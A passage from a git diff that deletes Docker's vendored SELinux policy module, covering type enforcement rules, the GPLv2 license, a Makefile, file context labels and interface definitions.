-term_create_pty(docker_t, docker_devpts_t) - -kernel_read_system_state(docker_t) -kernel_read_network_state(docker_t) -kernel_read_all_sysctls(docker_t) -kernel_rw_net_sysctls(docker_t) -kernel_setsched(docker_t) -kernel_read_all_proc(docker_t) - -domain_use_interactive_fds(docker_t) -domain_dontaudit_read_all_domains_state(docker_t) - -corecmd_exec_bin(docker_t) -corecmd_exec_shell(docker_t) - -corenet_tcp_bind_generic_node(docker_t) -corenet_tcp_sendrecv_generic_if(docker_t) -corenet_tcp_sendrecv_generic_node(docker_t) -corenet_tcp_sendrecv_generic_port(docker_t) -corenet_tcp_bind_all_ports(docker_t) -corenet_tcp_connect_http_port(docker_t) -corenet_tcp_connect_commplex_main_port(docker_t) -corenet_udp_sendrecv_generic_if(docker_t) -corenet_udp_sendrecv_generic_node(docker_t) -corenet_udp_sendrecv_all_ports(docker_t) -corenet_udp_bind_generic_node(docker_t) -corenet_udp_bind_all_ports(docker_t) - -files_read_config_files(docker_t) -files_dontaudit_getattr_all_dirs(docker_t) -files_dontaudit_getattr_all_files(docker_t) - -fs_read_cgroup_files(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_search_all(docker_t) -fs_getattr_all_fs(docker_t) - -storage_raw_rw_fixed_disk(docker_t) - -auth_use_nsswitch(docker_t) -auth_dontaudit_getattr_shadow(docker_t) - -init_read_state(docker_t) -init_status(docker_t) - -logging_send_audit_msgs(docker_t) -logging_send_syslog_msg(docker_t) - -miscfiles_read_localization(docker_t) - -mount_domtrans(docker_t) - -seutil_read_default_contexts(docker_t) -seutil_read_config(docker_t) - -sysnet_dns_name_resolve(docker_t) -sysnet_exec_ifconfig(docker_t) - -optional_policy(` - rpm_exec(docker_t) - rpm_read_db(docker_t) - rpm_exec(docker_t) -') - -optional_policy(` - fstools_domtrans(docker_t) -') - -optional_policy(` - iptables_domtrans(docker_t) -') - -optional_policy(` - openvswitch_stream_connect(docker_t) -') - -# -# lxc rules -# - -allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; - -allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; - -allow docker_t self:netlink_route_socket rw_netlink_socket_perms;; -allow docker_t self:netlink_audit_socket create_netlink_socket_perms; -allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; -allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; - -allow docker_t docker_var_lib_t:dir mounton; -allow docker_t docker_var_lib_t:chr_file mounton; -can_exec(docker_t, docker_var_lib_t) - -kernel_dontaudit_setsched(docker_t) -kernel_get_sysvipc_info(docker_t) -kernel_request_load_module(docker_t) -kernel_mounton_messages(docker_t) -kernel_mounton_all_proc(docker_t) -kernel_mounton_all_sysctls(docker_t) -kernel_unlabeled_entry_type(spc_t) -kernel_unlabeled_domtrans(docker_t, spc_t) - -dev_getattr_all(docker_t) -dev_getattr_sysfs_fs(docker_t) -dev_read_urand(docker_t) -dev_read_lvm_control(docker_t) -dev_rw_sysfs(docker_t) -dev_rw_loop_control(docker_t) -dev_rw_lvm_control(docker_t) - -files_getattr_isid_type_dirs(docker_t) -files_manage_isid_type_dirs(docker_t) -files_manage_isid_type_files(docker_t) -files_manage_isid_type_symlinks(docker_t) -files_manage_isid_type_chr_files(docker_t) -files_manage_isid_type_blk_files(docker_t) -files_exec_isid_files(docker_t) -files_mounton_isid(docker_t) -files_mounton_non_security(docker_t) -files_mounton_isid_type_chr_file(docker_t) - -fs_mount_all_fs(docker_t) -fs_unmount_all_fs(docker_t) -fs_remount_all_fs(docker_t) -files_mounton_isid(docker_t) -fs_manage_cgroup_dirs(docker_t) -fs_manage_cgroup_files(docker_t) -fs_relabelfrom_xattr_fs(docker_t) -fs_relabelfrom_tmpfs(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_list_hugetlbfs(docker_t) - -term_use_generic_ptys(docker_t) -term_use_ptmx(docker_t) -term_getattr_pty_fs(docker_t) -term_relabel_pty_fs(docker_t) -term_mounton_unallocated_ttys(docker_t) - -modutils_domtrans_insmod(docker_t) - -systemd_status_all_unit_files(docker_t) -systemd_start_systemd_services(docker_t) - -userdom_stream_connect(docker_t) -userdom_search_user_home_content(docker_t) -userdom_read_all_users_state(docker_t) -userdom_relabel_user_home_files(docker_t) -userdom_relabel_user_tmp_files(docker_t) -userdom_relabel_user_tmp_dirs(docker_t) - -optional_policy(` - gpm_getattr_gpmctl(docker_t) -') - -optional_policy(` - dbus_system_bus_client(docker_t) - init_dbus_chat(docker_t) - init_start_transient_unit(docker_t) - - optional_policy(` - systemd_dbus_chat_logind(docker_t) - systemd_dbus_chat_machined(docker_t) - ') - - optional_policy(` - firewalld_dbus_chat(docker_t) - ') -') - -optional_policy(` - udev_read_db(docker_t) -') - -optional_policy(` - unconfined_domain(docker_t) - # unconfined_typebounds(docker_t) -') - -optional_policy(` - virt_read_config(docker_t) - virt_exec(docker_t) - virt_stream_connect(docker_t) - virt_stream_connect_sandbox(docker_t) - virt_exec_sandbox_files(docker_t) - virt_manage_sandbox_files(docker_t) - virt_relabel_sandbox_filesystem(docker_t) - # for lxc - virt_transition_svirt_sandbox(docker_t, system_r) - virt_mounton_sandbox_file(docker_t) -# virt_attach_sandbox_tun_iface(docker_t) - allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; - virt_sandbox_entrypoint(docker_t) -') - -tunable_policy(`docker_connect_any',` - corenet_tcp_connect_all_ports(docker_t) - corenet_sendrecv_all_packets(docker_t) - corenet_tcp_sendrecv_all_ports(docker_t) -') - -######################################## -# -# spc local policy -# -allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint; -role system_r types spc_t; - -domtrans_pattern(docker_t, docker_share_t, spc_t) -domtrans_pattern(docker_t, docker_var_lib_t, spc_t) -allow docker_t spc_t:process { setsched signal_perms }; -ps_process_pattern(docker_t, spc_t) -allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; -filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay") - -optional_policy(` - systemd_dbus_chat_machined(spc_t) -') - -optional_policy(` - dbus_chat_system_bus(spc_t) -') - -optional_policy(` - unconfined_domain_noaudit(spc_t) -') - -optional_policy(` - virt_transition_svirt_sandbox(spc_t, system_r) - virt_sandbox_entrypoint(spc_t) -') - -######################################## -# -# docker_auth local policy -# -allow docker_auth_t self:fifo_file rw_fifo_file_perms; -allow docker_auth_t self:unix_stream_socket create_stream_socket_perms; -dontaudit docker_auth_t self:capability net_admin; - -docker_stream_connect(docker_auth_t) - -manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file }) - -domain_use_interactive_fds(docker_auth_t) - -kernel_read_net_sysctls(docker_auth_t) - -auth_use_nsswitch(docker_auth_t) - -files_read_etc_files(docker_auth_t) - -miscfiles_read_localization(docker_auth_t) - -sysnet_dns_name_resolve(docker_auth_t) - -######################################## -# -# OL7.2 systemd selinux update -# systemd_machined local policy -# -allow systemd_machined_t self:capability { dac_override setgid sys_admin sys_chroot sys_ptrace }; -allow systemd_machined_t systemd_unit_file_t:service { status start }; -allow systemd_machined_t self:unix_dgram_socket create_socket_perms; - -manage_dirs_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) -manage_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) -manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) -init_pid_filetrans(systemd_machined_t, systemd_machined_var_run_t, dir, "machines") - -manage_dirs_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) -manage_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) -manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) -init_var_lib_filetrans(systemd_machined_t, systemd_machined_var_lib_t, dir, "machines") - -kernel_dgram_send(systemd_machined_t) -# This is a bug, but need for now. -kernel_read_unlabeled_state(systemd_machined_t) - -init_dbus_chat(systemd_machined_t) -init_status(systemd_machined_t) - -userdom_dbus_send_all_users(systemd_machined_t) - -term_use_ptmx(systemd_machined_t) - -optional_policy(` - dbus_connect_system_bus(systemd_machined_t) - dbus_system_bus_client(systemd_machined_t) -') - -optional_policy(` - docker_read_share_files(systemd_machined_t) - docker_spc_read_state(systemd_machined_t) -') - -optional_policy(` - virt_dbus_chat(systemd_machined_t) - virt_sandbox_read_state(systemd_machined_t) - virt_signal_sandbox(systemd_machined_t) - virt_stream_connect_sandbox(systemd_machined_t) - virt_rw_svirt_dev(systemd_machined_t) - virt_getattr_sandbox_filesystem(systemd_machined_t) - virt_read_sandbox_files(systemd_machined_t) -') - - diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE deleted file mode 100644 index 5b6e7c66c2..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE +++ /dev/null @@ -1,340 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 2, June 1991 - - Copyright (C) 1989, 1991 Free Software Foundation, Inc. - 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -License is intended to guarantee your freedom to share and change free -software--to make sure the software is free for all its users. This -General Public License applies to most of the Free Software -Foundation's software and to any other program whose authors commit to -using it. (Some other Free Software Foundation software is covered by -the GNU Library General Public License instead.) You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -this service if you wish), that you receive source code or can get it -if you want it, that you can change the software or use pieces of it -in new free programs; and that you know you can do these things. - - To protect your rights, we need to make restrictions that forbid -anyone to deny you these rights or to ask you to surrender the rights. -These restrictions translate to certain responsibilities for you if you -distribute copies of the software, or if you modify it. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must give the recipients all the rights that -you have. You must make sure that they, too, receive or can get the -source code. And you must show them these terms so they know their -rights. - - We protect your rights with two steps: (1) copyright the software, and -(2) offer you this license which gives you legal permission to copy, -distribute and/or modify the software. - - Also, for each author's protection and ours, we want to make certain -that everyone understands that there is no warranty for this free -software. If the software is modified by someone else and passed on, we -want its recipients to know that what they have is not the original, so -that any problems introduced by others will not reflect on the original -authors' reputations. - - Finally, any free program is threatened constantly by software -patents. We wish to avoid the danger that redistributors of a free -program will individually obtain patent licenses, in effect making the -program proprietary. To prevent this, we have made it clear that any -patent must be licensed for everyone's free use or not licensed at all. - - The precise terms and conditions for copying, distribution and -modification follow. - - GNU GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License applies to any program or other work which contains -a notice placed by the copyright holder saying it may be distributed -under the terms of this General Public License. The "Program", below, -refers to any such program or work, and a "work based on the Program" -means either the Program or any derivative work under copyright law: -that is to say, a work containing the Program or a portion of it, -either verbatim or with modifications and/or translated into another -language. (Hereinafter, translation is included without limitation in -the term "modification".) Each licensee is addressed as "you". - -Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running the Program is not restricted, and the output from the Program -is covered only if its contents constitute a work based on the -Program (independent of having been made by running the Program). -Whether that is true depends on what the Program does. - - 1. You may copy and distribute verbatim copies of the Program's -source code as you receive it, in any medium, provided that you -conspicuously and appropriately publish on each copy an appropriate -copyright notice and disclaimer of warranty; keep intact all the -notices that refer to this License and to the absence of any warranty; -and give any other recipients of the Program a copy of this License -along with the Program. - -You may charge a fee for the physical act of transferring a copy, and -you may at your option offer warranty protection in exchange for a fee. - - 2. You may modify your copy or copies of the Program or any portion -of it, thus forming a work based on the Program, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) You must cause the modified files to carry prominent notices - stating that you changed the files and the date of any change. - - b) You must cause any work that you distribute or publish, that in - whole or in part contains or is derived from the Program or any - part thereof, to be licensed as a whole at no charge to all third - parties under the terms of this License. - - c) If the modified program normally reads commands interactively - when run, you must cause it, when started running for such - interactive use in the most ordinary way, to print or display an - announcement including an appropriate copyright notice and a - notice that there is no warranty (or else, saying that you provide - a warranty) and that users may redistribute the program under - these conditions, and telling the user how to view a copy of this - License. (Exception: if the Program itself is interactive but - does not normally print such an announcement, your work based on - the Program is not required to print an announcement.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Program, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Program, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote it. - -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Program. - -In addition, mere aggregation of another work not based on the Program -with the Program (or with a work based on the Program) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may copy and distribute the Program (or a work based on it, -under Section 2) in object code or executable form under the terms of -Sections 1 and 2 above provided that you also do one of the following: - - a) Accompany it with the complete corresponding machine-readable - source code, which must be distributed under the terms of Sections - 1 and 2 above on a medium customarily used for software interchange; or, - - b) Accompany it with a written offer, valid for at least three - years, to give any third party, for a charge no more than your - cost of physically performing source distribution, a complete - machine-readable copy of the corresponding source code, to be - distributed under the terms of Sections 1 and 2 above on a medium - customarily used for software interchange; or, - - c) Accompany it with the information you received as to the offer - to distribute corresponding source code. (This alternative is - allowed only for noncommercial distribution and only if you - received the program in object code or executable form with such - an offer, in accord with Subsection b above.) - -The source code for a work means the preferred form of the work for -making modifications to it. For an executable work, complete source -code means all the source code for all modules it contains, plus any -associated interface definition files, plus the scripts used to -control compilation and installation of the executable. However, as a -special exception, the source code distributed need not include -anything that is normally distributed (in either source or binary -form) with the major components (compiler, kernel, and so on) of the -operating system on which the executable runs, unless that component -itself accompanies the executable. - -If distribution of executable or object code is made by offering -access to copy from a designated place, then offering equivalent -access to copy the source code from the same place counts as -distribution of the source code, even though third parties are not -compelled to copy the source along with the object code. - - 4. You may not copy, modify, sublicense, or distribute the Program -except as expressly provided under this License. Any attempt -otherwise to copy, modify, sublicense or distribute the Program is -void, and will automatically terminate your rights under this License. -However, parties who have received copies, or rights, from you under -this License will not have their licenses terminated so long as such -parties remain in full compliance. - - 5. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Program or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Program (or any work based on the -Program), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Program or works based on it. - - 6. Each time you redistribute the Program (or any work based on the -Program), the recipient automatically receives a license from the -original licensor to copy, distribute or modify the Program subject to -these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. -You are not responsible for enforcing compliance by third parties to -this License. - - 7. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Program at all. For example, if a patent -license would not permit royalty-free redistribution of the Program by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Program. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system, which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 8. If the distribution and/or use of the Program is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Program under this License -may add an explicit geographical distribution limitation excluding -those countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 9. The Free Software Foundation may publish revised and/or new versions -of the General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - -Each version is given a distinguishing version number. If the Program -specifies a version number of this License which applies to it and "any -later version", you have the option of following the terms and conditions -either of that version or of any later version published by the Free -Software Foundation. If the Program does not specify a version number of -this License, you may choose any version ever published by the Free Software -Foundation. - - 10. If you wish to incorporate parts of the Program into other free -programs whose distribution conditions are different, write to the author -to ask for permission. For software which is copyrighted by the Free -Software Foundation, write to the Free Software Foundation; we sometimes -make exceptions for this. Our decision will be guided by the two goals -of preserving the free status of all derivatives of our free software and -of promoting the sharing and reuse of software generally. - - NO WARRANTY - - 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY -FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN -OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES -PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED -OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS -TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE -PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, -REPAIR OR CORRECTION. - - 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR -REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, -INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING -OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED -TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY -YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER -PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE -POSSIBILITY OF SUCH DAMAGES. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -convey the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA - - -Also add information on how to contact you by electronic and paper mail. - -If the program is interactive, make it output a short notice like this -when it starts in an interactive mode: - - Gnomovision version 69, Copyright (C) year name of author - Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, the commands you use may -be called something other than `show w' and `show c'; they could even be -mouse-clicks or menu items--whatever suits your program. - -You should also get your employer (if you work as a programmer) or your -school, if any, to sign a "copyright disclaimer" for the program, if -necessary. Here is a sample; alter the names: - - Yoyodyne, Inc., hereby disclaims all copyright interest in the program - `Gnomovision' (which makes passes at compilers) written by James Hacker. - - , 1 April 1989 - Ty Coon, President of Vice - -This General Public License does not permit incorporating your program into -proprietary programs. If your program is a subroutine library, you may -consider it more useful to permit linking proprietary applications with the -library. If this is what you want to do, use the GNU Library General -Public License instead of this License. diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile deleted file mode 100644 index 1bdc695afe..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile +++ /dev/null @@ -1,16 +0,0 @@ -TARGETS?=docker -MODULES?=${TARGETS:=.pp.bz2} -SHAREDIR?=/usr/share - -all: ${TARGETS:=.pp.bz2} - -%.pp.bz2: %.pp - @echo Compressing $^ -\> $@ - bzip2 -9 $^ - -%.pp: %.te - make -f ${SHAREDIR}/selinux/devel/Makefile $@ - -clean: - rm -f *~ *.tc *.pp *.pp.bz2 - rm -rf tmp *.tar.gz diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc deleted file mode 100644 index 467d659604..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc +++ /dev/null @@ -1,18 +0,0 @@ -/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) - -/usr/bin/dockerd -- gen_context(system_u:object_r:docker_exec_t,s0) - -/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) - -/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) - -/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) - -/var/run/docker\.pid -- gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) - -/var/lib/docker/init(/.*)? gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if deleted file mode 100644 index ca075c05c5..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if +++ /dev/null @@ -1,461 +0,0 @@ - -## The open-source application container engine. - -######################################## -## -## Execute docker in the docker domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_domtrans',` - gen_require(` - type docker_t, docker_exec_t; - ') - - corecmd_search_bin($1) - domtrans_pattern($1, docker_exec_t, docker_t) -') - -######################################## -## -## Execute docker in the caller domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_exec',` - gen_require(` - type docker_exec_t; - ') - - corecmd_search_bin($1) - can_exec($1, docker_exec_t) -') - -######################################## -## -## Search docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_search_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - files_search_var_lib($1) -') - -######################################## -## -## Execute docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_exec_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - can_exec($1, docker_var_lib_t) -') - -######################################## -## -## Read docker lib files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Read docker share files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_share_files',` - gen_require(` - type docker_share_t; - ') - - files_search_var_lib($1) - read_files_pattern($1, docker_share_t, docker_share_t) -') - -######################################## -## -## Manage docker lib files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) - manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Manage docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_dirs',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Create objects in a docker var lib directory -## with an automatic type transition to -## a specified private type. -## -## -## -## Domain allowed access. -## -## -## -## -## The type of the object to create. -## -## -## -## -## The class of the object to be created. -## -## -## -## -## The name of the object being created. -## -## -# -interface(`docker_lib_filetrans',` - gen_require(` - type docker_var_lib_t; - ') - - filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) -') - -######################################## -## -## Read docker PID files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_pid_files',` - gen_require(` - type docker_var_run_t; - ') - - files_search_pids($1) - read_files_pattern($1, docker_var_run_t, docker_var_run_t) -') - -######################################## -## -## Execute docker server in the docker domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_systemctl',` - gen_require(` - type docker_t; - type docker_unit_file_t; - ') - - systemd_exec_systemctl($1) - init_reload_services($1) - systemd_read_fifo_file_passwd_run($1) - allow $1 docker_unit_file_t:file read_file_perms; - allow $1 docker_unit_file_t:service manage_service_perms; - - ps_process_pattern($1, docker_t) -') - -######################################## -## -## Read and write docker shared memory. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_rw_sem',` - gen_require(` - type docker_t; - ') - - allow $1 docker_t:sem rw_sem_perms; -') - -####################################### -## -## Read and write the docker pty type. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_use_ptys',` - gen_require(` - type docker_devpts_t; - ') - - allow $1 docker_devpts_t:chr_file rw_term_perms; -') - -####################################### -## -## Allow domain to create docker content -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_filetrans_named_content',` - - gen_require(` - type docker_var_lib_t; - type docker_share_t; - type docker_log_t; - type docker_var_run_t; - type docker_home_t; - ') - - files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") - files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") - files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") - files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") - userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker") -') - -######################################## -## -## Connect to docker over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_stream_connect',` - gen_require(` - type docker_t, docker_var_run_t; - ') - - files_search_pids($1) - stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) -') - -######################################## -## -## Connect to SPC containers over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_spc_stream_connect',` - gen_require(` - type spc_t, spc_var_run_t; - ') - - files_search_pids($1) - files_write_all_pid_sockets($1) - allow $1 spc_t:unix_stream_socket connectto; -') - - -######################################## -## -## All of the rules required to administrate -## an docker environment -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_admin',` - gen_require(` - type docker_t; - type docker_var_lib_t, docker_var_run_t; - type docker_unit_file_t; - type docker_lock_t; - type docker_log_t; - type docker_config_t; - ') - - allow $1 docker_t:process { ptrace signal_perms }; - ps_process_pattern($1, docker_t) - - admin_pattern($1, docker_config_t) - - files_search_var_lib($1) - admin_pattern($1, docker_var_lib_t) - - files_search_pids($1) - admin_pattern($1, docker_var_run_t) - - files_search_locks($1) - admin_pattern($1, docker_lock_t) - - logging_search_logs($1) - admin_pattern($1, docker_log_t) - - docker_systemctl($1) - admin_pattern($1, docker_unit_file_t) - allow $1 docker_unit_file_t:service all_service_perms; - - optional_policy(` - systemd_passwd_agent_exec($1) - systemd_read_fifo_file_passwd_run($1) - ') -') - -interface(`domain_stub_named_filetrans_domain',` - gen_require(` - attribute named_filetrans_domain; - ') -') - -interface(`lvm_stub',` - gen_require(` - type lvm_t; - ') -') -interface(`staff_stub',` - gen_require(` - type staff_t; - ') -') -interface(`virt_stub_svirt_sandbox_domain',` - gen_require(` - attribute svirt_sandbox_domain; - ') -') -interface(`virt_stub_svirt_sandbox_file',` - gen_require(` - type svirt_sandbox_file_t; - ') -') -interface(`fs_dontaudit_remount_tmpfs',` - gen_require(` - type tmpfs_t; - ') - - dontaudit $1 tmpfs_t:filesystem remount; -') -interface(`dev_dontaudit_list_all_dev_nodes',` - gen_require(` - type device_t; - ') - - dontaudit $1 device_t:dir list_dir_perms; -') -interface(`kernel_unlabeled_entry_type',` - gen_require(` - type unlabeled_t; - ') - - 